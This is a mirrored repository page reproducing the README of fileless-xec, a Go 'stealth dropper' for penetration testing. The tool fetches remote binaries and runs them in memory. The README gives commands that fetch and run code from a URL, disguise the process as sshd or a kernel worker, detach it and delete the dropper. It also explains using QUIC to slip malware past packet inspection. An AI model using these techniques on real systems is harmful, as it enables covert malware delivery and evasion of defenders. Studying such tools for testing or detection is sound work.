Coder Social home page Coder Social logo

bambooqj / fileless-xec Goto Github PK

View Code? Open in Web Editor NEW

This project forked from ariary/fileless-xec

0.0 0.0 0.0 6.84 MB

Stealth dropper executing remote binaries without dropping them on disk .(HTTP3 support, invisible tracks, cross-platform,...)

License: MIT License

Makefile 1.36% Go 94.63% Shell 4.01%

fileless-xec's Introduction

➲ fileless-xec 🦜

👋 Certainly useful , mainly for fun, rougly inspired by 0x00 article

Pentest use: fileless-xec is used on target machine to stealthy execute a binary file located on attacker machine

➲ Short story

fileless-xec enable us to execute a remote binary on a local machine directly from memory without dropping them on disk

➪ Install

  • simple usage fileless-xec <binary_url> (~curl | sh for binaries)
  • execute binary with specified program name: fileless-xec -n /usr/sbin/sshd <binary_raw_url>
  • detach program execution from tty: setsid fileless-xec [...]

demo

Explanation We want to execute writeNsleep binary locate on a remote machine, locally.

We first start a python http server on remote. Locally we use fileless-xec and impersonate the /usr/sbin/sshd name for the execution of the binary writeNsleep(for stealthiness & fun). Once writeNsleep started fileless-xec will delete itself (--self-remove)

Other use cases

➲ Stealthiness story

  • The binary file is not mapped into the host file system
  • The execution program name could be customizable
  • Bypass 3rd generation firewall could be done with http3 support
  • fileless-xec self removes once launched

memfd_create

The remote binary file is stored locally using memfd_create syscall, which store it within a memory disk which is not mapped into the file system (ie you can't find it using ls).

fexecve

Then we execute it using fexecve syscall (as it is currently not provided by syscall golang library we implem it).

With fexecve , we could but we reference the program to run using a file descriptor, instead of the full path.

HTTP3/QUIC

Enable it with -Q/http3 flag.
You can setup a light web rootfs server supporting http3 by running go run ./test/http3/light-server.go -p LISTENING PORT (This is http3 equivalent of python3 -m http.server )
use test/http3/genkey.sh to generate cert and key.

QUIC UDP aka http3 is a new generation Internet protocol that speeds online web applications that are susceptible to delay, such as searching, video streaming etc., by reducing the round-trip time (RTT) needed to connect to a server.

Because QUIC uses proprietary encryption equivalent to TLS (this will change in the future with a standardized version), 3rd generation firewalls that provide application control and visibility encounter difficulties to control and monitor QUIC traffic.

If you actually use fileless-xec as a dropper (Only for testing purpose or with the authorization), you likely want to execute some type of malwares or other file that could be drop by packet analysis. Hence, with Quic enables you could bypass packet analysis and GET a malware.

Also, in case firewall is only used for allowing/blocking traffic it could happen that firewall rules forget the udp protocol making your requests go under the radars

other skill for stealthiness

Although not present on the memory disk, the running program can still be detected using ps command for example.

  1. Cover the tracks with a fake program name

fileless-xec --name <fake_name> <binary_raw_url> by default the name is [kworker/u:0]

  1. Detach from tty to map behaviour of deamon process

setsid fileless-xec <binary_raw_url>. WIP call setsid from code

Caveats

You could still be detected with:

$ lsof | grep memfd

fileless-xec's People

Contributors

ariary avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.